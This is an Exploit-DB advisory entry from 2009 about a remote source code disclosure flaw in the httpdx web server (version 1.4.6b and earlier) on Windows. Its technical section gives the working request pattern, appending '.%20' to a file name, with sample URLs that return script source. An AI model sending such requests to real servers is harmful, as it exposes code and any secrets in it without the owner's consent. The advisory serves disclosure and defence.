httpdx 1.4.6b - Source Disclosure

EDB-ID:

9885

CVE:


Author:

Dr_IDE

Type:

webapps

Platform:

Windows

Published:

2009-10-21

################################################
#
# httpdx <= 1.4.6b Remote Source Disclosure
# Found By: Dr_IDE
# Tested On: Windows XPSP3
# Download: httpdx.sourceforge.net/downloads/
#
################################################

- Description -

httpdx Web Server <= 1.4.6b is a Windows based HTTP server. This is the latest
version of the application available.

httpdx is vulnerable to remote arbitrary source code disclosure by the following means.

- Technical Details -

http://[ webserver IP]/[ file ][.%20]

http://172.16.2.101/index.html.%20
http://172.16.2.101/test.py.%20
http://172.16.2.101/test.php.%20

#[pocoftheday.blogspot.com]